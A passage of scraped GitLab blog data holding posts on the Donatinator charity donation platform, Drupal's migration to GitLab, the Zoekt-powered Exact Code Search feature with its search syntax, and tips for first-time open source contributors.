there must be an open source project out there already that could do all of this for free. Small charities and non-profits don't have the ability to pay for things up front, especially when it's not part of their core mission. After a while reading, reviewing, comparing, and planning, my non-negotiable for the platform became that \"We didn't have to pay more than necessary.\"\n\nThe only fee we wouldn't be able to get around was credit card processing. 
The fact that we would only pay a percentage fee once we receive a donation, rather than up front, was also a good result.
GitLab's handbook has a great page on values but a very small part of that is the idea of [boring solutions](https://handbook.gitlab.com/handbook/values/#efficiency) which we're also using to guide our technology decisions, keeping things simple and lite.\n\n### A word on pragmatism\n\nEven though we'd love everything to be open source, we know we can't have everything. With that we'd like to thank the following companies that we're currently using to make The Donatinator fulfill its aim. With free plans on Heroku, Google, Glitch, Zeit, MailGun, and others, we should be able to achieve these goals for charities who may only receive a few donations each month, which can make all the difference between helping people or closing down completely due to insufficient funds. Also thanks to Stripe for having a discounted fee for registered charities to maximize each and every donation.\n\nWhich leads me to a confession ...\n\n## A high high, and a low low\n\nStarting a new project is always exciting. Tap tap, code, test, commit, one late night after another. But then the bad news came ...\n\nThe small charity all of this work was initially done for decided to use an existing donor platform. I can understand why, but rather than dwelling on it, I decided to continue working on The Donatinator anyway. I'm still convinced there is a place for it in the world and a variety of people and organisations can benefit from it, if only they knew about it.\n\n## Asking for help, contributions, and donations\n\nWithout shame I am now asking you all for help. The Donatinator is a new project and there is still lots to do, however there are three main areas in which help would be awesome and greatly appreciated!\n\n### Please contribute!\n\nFirstly, contributions of [code](https://gitlab.com/donatinator/donatinator/) and [documentation](https://gitlab.com/donatinator/docs/) are welcome and very important. 
Participating in the [community](https://spectrum.chat/donatinator) also helps a project thrive and we'd love to chat to you about your needs and requirements.\n\n### Please donate!\n\nSecondly, I'm looking for [patrons and sponsorship](https://donate.donatinator.org/) (yes, it's self hosted) to be able to take the project forward faster. Sustainable open source is still a panacea but I believe it can happen. I don't believe that the charities and non-profits who use The Donatinator should have to pay for the use of it but that means we need to look elsewhere to help with sustainability.\n\n### Please spread the word!\n\nAnd finally but most importantly – users! If there are no users, then there is no project.\n\nIf you know a person, a non-profit, or a charity who could use [The Donatinator](http://donatinator.org/), please get in touch with them. Many are run by non-technical volunteers and they would love to have your help in setting up online donations. Get in touch with us too, for help or if you have any questions – we'd love to hear about your progress and your feedback would be invaluable!\n\n(You could also run The Donatinator yourself for your own open source project or for your own patron portal. Hint hint! 😃)\n\nThere is lots of functionality penciled in for future Donatinator releases but there is nothing like having real users provide ideas or ask for specific features. This is a terrific opportunity to help the helpers ... so come on, let's make it happen! 
We can do this 😃\n\nCover image by [Steve Johnson](https://unsplash.com/photos/0sPFjdcRhko?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/coins?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,267,910],{"slug":1845,"featured":6,"template":689},"donatinator-open-source-donation-platform","content:en-us:blog:donatinator-open-source-donation-platform.yml","Donatinator Open Source Donation Platform","en-us/blog/donatinator-open-source-donation-platform.yml","en-us/blog/donatinator-open-source-donation-platform",{"_path":1851,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1852,"content":1857,"config":1863,"_id":1865,"_type":14,"title":1866,"_source":16,"_file":1867,"_stem":1868,"_extension":19},"/en-us/blog/drupal-moves-to-gitlab",{"title":1853,"description":1854,"ogTitle":1853,"ogDescription":1854,"noIndex":6,"ogImage":815,"ogUrl":1855,"ogSiteName":673,"ogType":674,"canonicalUrls":1855,"schema":1856},"Come on in! Drupal is moving to GitLab","Free and open source platform Drupal is moving to GitLab to accelerate developer velocity and attract new talent and contributors to the project.","https://about.gitlab.com/blog/drupal-moves-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Come on in! Drupal is moving to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2018-08-16\",\n      }",{"title":1853,"description":1854,"authors":1858,"heroImage":815,"date":1860,"body":1861,"category":10,"tags":1862},[1859],"Rebecca Dodd","2018-08-16","\nWe never get tired of hearing about [open source projects joining the GitLab fold](/blog/welcome-gnome-to-gitlab/). So, welcome to GitLab, [Drupal](https://www.drupal.org/)! 
In light of this news, we chatted to Director of Engineering for the Drupal Association, [Timothy Lehnen](https://drupal.org/u/hestenet), about the project and why they're moving to GitLab.\n\n## Q&A\n\n- [What is Drupal?](#what-is-drupal)\n- [How is Drupal used?](#how-is-drupal-used-how-does-it-help-people)\n- [How many contributors work on the project?](#how-many-contributors-work-on-the-project)\n- [Why might someone use Drupal over other content management tools?](#why-might-someone-use-drupal-over-other-content-management-tools)\n- [Why are you migrating to GitLab?](#why-are-you-migrating-to-gitlab)\n- [How do you expect this move to beneficial to Drupal?](#how-do-you-expect-this-move-to-beneficial-to-drupal)\n- [How can people get involved in the project?](#how-can-people-get-involved-in-the-project)\n\n### What is Drupal?\n\nDrupal is a platform for building ambitious digital experiences. It was one of the first open source content management systems released more than 17 years ago, and is now used to power content-driven experiences including: the web, mobile, augmented reality, in-flight entertainment, medical devices, and more. Drupal is also the leading platform for building the open web. In a time when the dangers of walled-garden content publishers are becoming more and more clear, Drupal is a powerful tool to keep control in the hands of creators.\n\n### How is Drupal used? How does it help people?\n\nDrupal powers important platforms for engagement all over the world. In the governmental space you can find Drupal powering systems like [NASA.gov](https://www.nasa.gov/), the Australian [GovCMS](https://www.govcms.gov.au/), and the European Union. In the commerce space, Drupal is used to power traditional ecommerce websites, but also the holistic point-of-sale and accounting systems of the billion dollar businesses like ZKungFu, the largest directly operated food chain in China. 
Drupal is also the backbone of healthcare and higher education systems across the globe. Drupal can even be found behind the scenes running internal systems for the world's largest technology companies.\n\nFinally, Drupal empowers individuals and small teams to rapidly respond to current events, pitching in to give back to their communities. For example, UC Davis just launched their [Article 26 Backpack](https://www.drupal.org/blog/building-digital-backpacks-for-syrian-refugees) program for Syrian refugees, powered by Drupal.\n\n### How many contributors work on the project?\n\nIn the past year 111,783 people have contributed to Drupal in some form on Drupal.org. Over the course of the last 17 years, many hundreds of thousands of people have contributed in some way to the Drupal project.\n\n### Why might someone use Drupal over other content management tools?\n\nDrupal is a tool for building many kinds of internet-connected applications (not just websites), and is a powerful tool whenever you want to deliver rich, meaningful experiences. Drupal's not the best choice for brochure-ware sites, but that doesn't mean it's only limited to the enterprise. In any situation where you are managing large volumes of data, personalizing content for your end-users, or need a content hub to be consumed by a variety of interfaces and end-points, Drupal is an excellent choice.\n\n>In any situation where you are managing large volumes of data, personalizing content for your end-users, or need a content hub to be consumed by a variety of interfaces and end-points, Drupal is an excellent choice\n\nEven when your needs are less ambitious, Drupal has a rich library of modules and third-party integrations that provide the building blocks for powerful platforms.\n\n### Why are you migrating to GitLab?\n\nThe Drupal project began before Git was invented. 
The first version [control system](/topics/version-control/what-is-centralized-version-control-system/) that the project used was CVS, before the project migrated to Git in 2012. Over the course of almost two decades the Drupal project has developed our own contribution practices and developer tools, and while many of those tools and practices are leading examples in the open source world, others have fallen behind. For example, the Drupal project still handles code contributions through a patch workflow rather than through a pull/merge request workflow that has become the standard for collaborative development.\n\nWhen we began the search for a new partner to help us modernize our developer tooling, we set the following goals:\n\n- Adopt a developer workflow that will be familiar to the millions of developers outside our community\n- Preserve those unique elements of how we collaborate that have made the Drupal project so successful:\n    - Many-to-one collaboration: that is to say, many developers collaborating on a single solution to a problem\n    - Maintainer approval workflow\n    - Picking up on longstanding issues where other collaborators left off\n    - Contribution credit\n- If possible, leverage an expert partner who will help keeping our tooling up to date as open source collaboration tools continue to evolve\n\nDuring our search, GitLab was emerging as a powerful new player in the code collaboration market, and of all the teams we spoke to, GitLab's leadership demonstrated the greatest commitment to working with us to find a solution that would work for the Drupal project. 
The combination of that commitment to collaboration and the powerful featureset that GitLab continues to improve at a rapid pace is what helped us make our ultimate decision.\n\n### How do you expect this move to beneficial to Drupal?\n\nMoving our code collaboration tools to GitLab will help Drupal to accelerate developer velocity, and attract new talent and contributors to the project.\n\nBy giving Drupal contributors access to a merge request workflow, inline editing tools, code review, and other features of the GitLab platform they can spend less time on the administrivia and more time building Drupal.\n\n>By giving Drupal contributors access to a merge request workflow, inline editing tools, code review, and other features of the GitLab platform they can spend less time on the administrivia and more time building Drupal\n\nSimilarly, by adopting a toolchain that is much more familiar to the up-and-coming generation of developers, we can lower the barriers to entry for new contributors to join our community. For more information about the Drupal project's journey towards selecting GitLab, check out our [blog series on Drupal.org](https://www.drupal.org/drupalorg/blog/developer-tools-initiative-part-5-gitlab-partnership).\n\n### How can people get involved in the project?\n\nThe Drupal community has a comprehensive [Getting Involved Guide](https://www.drupal.org/getting-involved-guide) that can help individuals find their place in the Drupal community. There are also meet ups and conferences around the world that are a great way to start your Drupal journey. 
In particular, DrupalCon will be coming to [Seattle from April 8-12 2019](https://events.drupal.org/seattle2019).\n\nThe Drupal project's motto has always been \"Come for the code, stay for the community\" and seventeen years later, that's a sentiment we still believe in.\n",[9,267],{"slug":1864,"featured":6,"template":689},"drupal-moves-to-gitlab","content:en-us:blog:drupal-moves-to-gitlab.yml","Drupal Moves To Gitlab","en-us/blog/drupal-moves-to-gitlab.yml","en-us/blog/drupal-moves-to-gitlab",{"_path":1870,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1871,"content":1874,"config":1881,"_id":1883,"_type":14,"title":1884,"_source":16,"_file":1885,"_stem":1886,"_extension":19},"/en-us/blog/exact-code-search-find-code-faster-across-repositories",{"noIndex":6,"title":1872,"description":1873},"Exact Code Search: Find code faster across repositories","Discover how this new GitLab feature can find exact matches, use regex patterns, and see contextual results across terabytes of codebases.",{"title":1872,"description":1873,"authors":1875,"heroImage":1877,"date":1878,"body":1879,"category":1495,"tags":1880},[1876],"Dmitry Gruzd","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675154/Blog/Hero%20Images/blog-image-template-1800x945__8_.png","2025-06-25","**TL;DR:** What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new [Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html) makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.\n## Why traditional code search is challenging\n\nAnyone who works with code knows the frustration of searching across repositories. 
Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.\n\nThese conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.\n\nGitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After [evaluating numerous options](https://gitlab.com/groups/gitlab-org/-/epics/7404), we developed a better solution.\n\n## Introducing Exact Code Search: Three game-changing capabilities\n\nEnter GitLab's **[Exact Code Search](https://docs.gitlab.com/ee/user/search/exact_code_search.html)**, currently in beta testing and powered by [Zoekt](https://github.com/sourcegraph/zoekt) (pronounced \"zookt\", Dutch for \"search\"). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.\n\nThis feature revolutionizes how you find and understand code with three key capabilities:\n\n**1. Exact Match mode: Zero false positives**\n\nWhen toggled to **Exact Match mode**, the search engine returns only results that match your query exactly as entered, eliminating false positives. 
This precision is invaluable when:\n\n* Searching for specific error messages\n* Looking for particular function signatures\n* Finding instances of specific variable names\n\n**2. Regular Expression mode: Powerful pattern matching**\n\nFor complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:\n\n* Find functions following specific naming patterns\n* Locate variables matching certain constraints\n* Identify potential security vulnerabilities using pattern matching\n\n**3. Multiple-line matches: See code in context**\n\n![Exact Code Search](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png)\n\nInstead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.\n\n## From features to workflows: Real-world use cases and impact\n\nLet's see how these capabilities translate to real productivity gains in everyday development scenarios:\n\n### Debugging: From error message to root cause in seconds\n\nBefore Exact Code Search:\nCopy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.\n\nWith Exact Code Search:\n\n1. Copy the exact error message\n2. Paste it into Exact Code Search with Exact Match mode\n3. 
Instantly find the precise location where the error is thrown, with surrounding context\n\n**Impact:** Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.\n\n### Code exploration: Master unfamiliar codebases quickly\n\nBefore Exact Code Search:\nBrowse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.\n\nWith Exact Code Search:\n\n* Search for key methods or classes with Exact Match mode\n* Review multiple line matches to understand implementation details\n* Use Regular Expression mode to find similar patterns across the codebase\n\n**Impact:** Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.\n\n### Refactoring with confidence\n\nBefore Exact Code Search:\nAttempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.\n\nWith Exact Code Search:\n\n* Use Exact Match mode to find all occurrences of methods or variables\n* Review context to understand usage patterns\n* Plan your refactoring with complete information about impact\n\n**Impact:** Eliminate the \"missed instance\" bugs that often plague refactoring efforts, improving code quality and reducing rework.\n\n### Security auditing: Finding vulnerable patterns\n\nSecurity teams can:\n\n* Create regex patterns matching known vulnerable code\n* Search across all repositories in a namespace\n* Quickly identify potential security issues with context that helps assess risk\n\n**Impact:** Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.\n\n### Cross-repository insights\n\nSearch across your entire namespace or instance to:\n\n* Identify similar implementations across different projects\n* Discover opportunities for shared libraries or standardization\n\n**Impact:** Break down silos between projects and 
identify opportunities for code reuse and standardization.\n\n## The technical foundation: How Zoekt delivers speed and precision\n\nBefore diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.\n\n### Positional trigrams: The secret to lightning-fast exact matches\n\nZoekt's speed comes from its use of **positional trigrams** — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.\n\nHere's how it works:\n\n**Traditional full-text search engines** like Elasticsearch tokenize code into words and lose positional information. When you search for `getUserId()`, they might return results containing **user**, **get**, and **Id** scattered throughout a file — leading to those frustrating false positives for GitLab users.\n\n**Zoekt's positional trigrams** maintain exact character sequences and their positions. When you search for `getUserId()`, Zoekt looks for the exact trigrams like **get**, **etU**, **tUs**, **Use**, **ser**, **erI**, **rId**, **Id(\", \"d()**, all in the correct sequence and position. This ensures that only exact matches are returned.\n\nThe result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was [one of our most requested features](https://gitlab.com/gitlab-org/gitlab/-/issues/325234) for good reason - developers were losing significant time sifting through false positives.\n\n### Regular expression performance at scale\n\nZoekt excels at exact matches and is optimized for regular expression searches. 
The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.\n\n## Built for enterprise scale\n\nExact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.\n\n### Handling terabytes of code with ease\n\nOn GitLab.com alone, our Exact Code Search infrastructure indexes and searches over **48 TB** of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.\n\n### Self-registering node architecture\n\nOur innovative implementation features:\n\n* **Automatic node registration:** Zoekt nodes register themselves with GitLab\n* **Dynamic shard assignment:** The system automatically assigns namespaces to nodes\n* **Health monitoring:** Nodes that don't check in are automatically marked offline\n\nThis self-configuring architecture dramatically simplifies scaling. 
When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.\n\n### Distributed system with intelligent load balancing\n\nBehind the scenes, Exact Code Search operates as a distributed system with these key components:\n\n* **Specialized search nodes:** Purpose-built servers that handle indexing and searching\n* **Smart sharding:** Code is distributed across nodes based on namespaces\n* **Automatic load balancing:** The system intelligently distributes work based on capacity\n* **High availability:** Multiple replicas ensure continuous operation even if nodes fail\n\n*Note: High availability is built into the architecture but not yet fully enabled. See [Issue 514736](https://gitlab.com/gitlab-org/gitlab/-/issues/514736) for updates.*\n\n### Seamless security integration\n\nExact Code Search automatically integrates with GitLab's permission system:\n\n* Search results are filtered based on the user's access rights\n* Only code from projects the user has access to is displayed\n* Security is built into the core architecture, not added as an afterthought\n\n### Optimized performance\n\n* **Efficient indexing:** Large repositories are indexed in tens of seconds\n* **Fast query execution:** Most searches return results with sub-second response times\n* **Streaming results:** The new gRPC-based federated search streams results as they're found\n* **Early termination:** Once enough results are collected, the system pauses searching\n\n## From library to distributed system: Engineering challenges we solved\n\nWhile Zoekt provided the core search technology, it was originally designed as a minimal library for managing `.zoekt` index files - not a distributed database or enterprise-scale service. 
Here are the key engineering challenges we overcame to make it work at GitLab's scale\"\n\n### Challenge 1: Building an orchestration layer\n\n**The problem:** Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.\n\n**Our solution:** We built a comprehensive orchestration layer that:\n\n* Creates and manages database models to track nodes, indices, repositories, and tasks\n* Implements a self-registering node architecture (inspired by GitLab Runner)\n* Handles automatic shard assignment and load balancing across nodes\n* Provides bidirectional API communication between GitLab Rails and Zoekt nodes\n\n### Challenge 2: Scaling storage and indexing\n\n**The problem:** How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?\n\n**Our solution:** We implemented:\n\n* Intelligent sharding: Namespaces are distributed across nodes based on capacity and load\n* Independent replication: Each node independently indexes from [Gitaly](https://gitlab.com/gitlab-org/gitaly) (our Git storage service), eliminating complex synchronization\n* Watermark management: Sophisticated storage allocation that prevents nodes from running out of space\n* Unified binary architecture: A single `gitlab-zoekt` binary that can operate in both indexer and webserver modes\n\n### Challenge 3: Permission Integration\n\n**The problem:** Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.\n\n**Our solution:** We built native permission filtering directly into the search flow:\n\n* Search requests include user permission context\n* Results are filtered to include only those the user can access in case permissions change before indexing completes\n\n### Challenge 4: Operational simplicity\n\n**The problem:** Managing a distributed search system shouldn't require a dedicated team.\n\n**Our solution:**\n\n* Auto-scaling: 
Adding capacity is as simple as deploying more nodes - they automatically register and start handling work\n* Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed\n* Zero-configuration sharding: The system automatically determines optimal shard assignments\n\n## Gradual rollout: Minimizing risk at scale\n\nRolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:\n\n### Phase 1: Controlled testing (gitlab-org group)\n\nWe started by enabling Exact Code Search only for the `gitlab-org` group - our own internal repositories. This allowed us to:\n\n* Test the system with real production workloads\n* Identify and fix performance bottlenecks\n* Streamline the deployment process\n* Learn from real users' workflows and feedback\n\n### Phase 2: Performance validation and optimization\n\nBefore expanding, we focused on ensuring the system could handle GitLab.com's scale:\n\n* Implemented comprehensive monitoring and alerting\n* Validated storage management with real production data growth\n\n### Phase 3: Incremental customer expansion\n\nWe gradually expanded to customers interested in testing Exact Code Search:\n\n* Gathered feedback on performance and user experience\n* Refined the search UI based on real user workflows\n* Optimized indexing performance (large repositories like `gitlab-org/gitlab` now index in ~10 seconds)\n* Refined the architecture based on operational learnings\n* Massively increased indexing throughput and improved state transition livecycle\n\n### Phase 4: Broad rollout\n\nToday, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. 
Users can:\n\n* Toggle between regex and exact search modes\n* Experience the benefits without any configuration changes\n* Fall back to the previous search if needed (though few choose to)\n\nRolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.\n\n> **For technical deep dive:** Interested in the detailed architecture and implementation? Check out our comprehensive [design document](https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/) for in-depth technical details about how we built this distributed search system.\n\n## Getting started with Exact Code Search\n\nGetting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).\n\n### Quickstart guide\n\n1. Navigate to the Advanced Search in your GitLab project or group\n2. Enter your search term in the code tab\n3. Toggle between Exact Match and Regular Expression modes\n4. Use filters to refine your search\n\n### Basic search syntax\n\nWhether using Exact Match or Regular Expression mode, you can refine your search with modifiers:\n\n| Query Example | What It Does                                             |\n| ------------- | -------------------------------------------------------- |\n| `file:js`     | Searches only in files containing \"js\" in their name     |\n| `foo -bar`    | Finds \"foo\" but excludes results with \"bar\"              |\n| `lang:ruby`   | Searches only in Ruby files                              |\n| `sym:process` | Finds \"process\" in symbols (methods, classes, variables) |\n\n> **Pro Tip:** For the most efficient searches, start specific and then broaden if needed. 
Using `file:` and `lang:` filters dramatically increases relevance.\n\n### Advanced search techniques\n\nStack multiple filters for precision:\n\n```\nis_expected file:rb -file:spec\n```\n\nThis finds \"is_expected\" in Ruby files that don't have \"spec\" in their name.\n\nUse regular expressions for powerful patterns:\n\n```\ntoken.*=.*[\\\"']\n```\n\n[Watch this search performed against the GitLab Zoekt repository.](https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&nav_source=navbar&project_id=46649240&group_id=9970&search_code=true&repository_ref=main&regex=true)\n\nThe search helps find hardcoded passwords, which, if not found, can be a security issue.\n\nFor more detailed syntax information, check the [Exact Code Search documentation](https://docs.gitlab.com/user/search/exact_code_search/#syntax).\n\n## Availability and deployment\n\n### Current availability\n\nExact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:\n\n* Available for over 99% of licensed groups\n* Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag\n\n### Self-managed deployment options\n\nFor self-managed instances, we offer several deployment methods:\n\n* Kubernetes/Helm: Our most well-supported method, using our [`gitlab-zoekt` Helm chart](https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt)\n* Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods\n\nSystem requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.\n\n## What's coming next\n\nWhile Exact Code Search is already powerful, we're continuously improving it:\n\n* **Scale optimizations** to support instances with hundreds of thousands of repositories\n* **Improved self-managed deployment** options, including streamlined Omnibus support\n* **Full high availability support** with 
automatic failover and load balancing\n\nStay tuned for updates as we move from Beta to General Availability.\n\n## Transform how you work with code\n\nGitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:\n\n* No more wasting time with irrelevant results\n* No more missing important matches\n* No more clicking through files just to understand basic context\n* No more performance issues as codebases grow\n\nThe impact extends beyond individual productivity:\n\n* **Teams collaborate better** with easy code referencing\n* **Knowledge sharing accelerates** when patterns are discoverable\n* **Onboarding becomes faster** with quick codebase comprehension\n* **Security improves** with effective pattern auditing\n* **Technical debt reduction** becomes more feasible\n\nExact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.\n\n**We'd love to hear from you!** Share your experiences, questions, or feedback about Exact Code Search in our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/420920). Your input helps us prioritize improvements and new features.\n\n> #### Ready to experience smarter code search? Learn more in our [documentation](https://docs.gitlab.com/ee/user/search/exact_code_search.html) or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? 
Try [a free, 60-day trial of GitLab Ultimate with Duo](https://about.gitlab.com/free-trial/)!",[1495,752,9],{"featured":6,"template":689,"slug":1882},"exact-code-search-find-code-faster-across-repositories","content:en-us:blog:exact-code-search-find-code-faster-across-repositories.yml","Exact Code Search Find Code Faster Across Repositories","en-us/blog/exact-code-search-find-code-faster-across-repositories.yml","en-us/blog/exact-code-search-find-code-faster-across-repositories",{"_path":1888,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1889,"content":1895,"config":1900,"_id":1902,"_type":14,"title":1903,"_source":16,"_file":1904,"_stem":1905,"_extension":19},"/en-us/blog/first-time-open-source-contributor-5-things-to-get-you-started",{"title":1890,"description":1891,"ogTitle":1890,"ogDescription":1891,"noIndex":6,"ogImage":1892,"ogUrl":1893,"ogSiteName":673,"ogType":674,"canonicalUrls":1893,"schema":1894},"First time open source contributor? 5 things to get you started","Open source really is *open* but it can be difficult to know where (and how) to jump in. Here's our best advice.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671390/Blog/Hero%20Images/developers-choose-open-source.jpg","https://about.gitlab.com/blog/first-time-open-source-contributor-5-things-to-get-you-started","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"First time open source contributor? 5 things to get you started\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2022-02-07\",\n      }",{"title":1890,"description":1891,"authors":1896,"heroImage":1892,"date":1897,"body":1898,"category":682,"tags":1899},[970],"2022-02-07","If you haven’t yet contributed to an open source software project, you may be eager to get going. 
Contributing to open source is a [great way to learn, teach, and build your technical expertise](https://clearcode.cc/blog/why-developers-contribute-open-source-software/). And it feels good to be part of a community. Yet your first time contributing can be intimidating. Here are five things you need to know to get up and running on open source:\n\n1. Contributing isn’t just about writing code. Open source projects need help on a variety of things, starting with coding, but also things like designing navigation and menus, writing documentation, managing timelines, organizing open issues, moderating message boards and answering questions. [Other ways to get started/](https://www.hanselman.com/blog/get-involved-in-open-source-today-how-to-contribute-a-patch-to-a-github-hosted-open-source-project-like-code-52) File a bug and suggest a patch for it or suggest a feature. In short, [there are many ways to contribute](https://opensource.guide/how-to-contribute/#why-contribute-to-open-source), in line with your interests and expertise. And no matter what you give, you’ll meet people and become an appreciated member of the group – sometimes contributing on ancillary things will earn you more points than coding.  \n\n2. Confusion is ok. If you’re bewildered at first, it’s not just because you’re a newbie. Each open source project has its own culture, [including terms of art, behavior norms, accepted practices](https://opensource.guide/how-to-contribute/#orienting-yourself-to-a-new-project), etc. So, even if you work for years on one project and are completely up to speed on what life is like there, it’s more than likely your next project will be totally different. There are some things that are usually present, such as the [roles of people on the project](https://opensource.guide/leadership-and-governance/), including author, owner, maintainer, contributor and committer. 
But the fact is, it will take time, observation and interacting with project members to understand how things are done within a project – and whether or not you are a good fit. If the vibe is not right, go elsewhere. There are so many projects that could use your support.    \n\n3. If there is a code of conduct, you need to get familiar with it. Not all open source projects will have a [code of conduct](https://opensource.guide/code-of-conduct/). When you’re interested in a project, be sure to see if there is a code of conduct and, if so, what it says. That way, you won’t make a gaffe without realizing it (and having to hear about it from everyone else). At a high level, respect the other participants (see number 5, below). If there is no explicit code of conduct, there are [core values and norms](https://opensource.com/open-organization/21/8/leadership-cultural-social-norms) that are recognized in the open source community. Chief among these are kindness and worldwide collaboration.\n\n4. Open Source Projects often have community governance models. There are [three types of org structures](https://opensource.guide/leadership-and-governance/) generally associated with open source projects: BDFL (Benevolent Dictator for Life; [Python](/blog/beginner-guide-python-programming/)is [one example](https://artsandculture.google.com/entity/benevolent-dictator-for-life/m03m3r0l?hl=en), meritocracy (this exact term may not be used but it’s about the relative “merit” of contributions; [Apache projects](https://www.apache.org/index.html#projects-list) follow this model) or liberal contribution (under which the people who contribute the most have the most say; [Node.js](https://openjsf.org) and [Rust](/blog/rust-programming-language/)are examples). In recent years, the BDFL model has [fallen out of favor](https://readwrite.com/open-source-magento-roy-rubin-bdfl/) in some circles as it leaves the project vulnerable if a leader steps away. 
[As Jason Baker wrote](https://opensource.com/article/18/7/bdfl) on OpenSource.com, “How an open source project is governed can have very real consequences on the long-term sustainability of its user and developer communities alike.” Just something to keep in mind.\n\n5. When in doubt, ask away, there are no dumb questions. As with any group you might belong to, you and the other members will be happier if the tone is welcoming and kind. Essentially, you’re there to collaborate so respect is important. Open source participants tend to be diverse in every possible way, stay open and considerate. Women traditionally are underrepresented in open source, [so be encouraging](https://internethealthreport.org/2019/codes-of-conduct-in-open-source-communities/). Try not to waste people’s time and provide as much context as needed in issues and conversations. Most projects will set the expectation that participants should [respect each other and be civil](https://developer.mozilla.org/en-US/docs/MDN/Contribute/Open_source_etiquette) in their interactions. \n\nThe rules are a lot like the ones you may have learned in your childhood: Observe before you jump in, share your knowledge generously, always thank people who help you, and play well with others. Don’t be tempted to add to threads just to see your name. Try to find answers to questions within the community before you ask. Read the README file. [Read the documentation](https://gomakethings.com/open-source-etiquette/). If you do ask a question or send a pull request, be patient. Don't expect an immediate reply and don’t keep posting the same question. People have different priorities and might have been caught up with work and life. Make sure you have buy-in from project implementers before you send in actual code. This shows you want to contribute and you respect the work that has gone on before you.    \n\nReady to get started? 
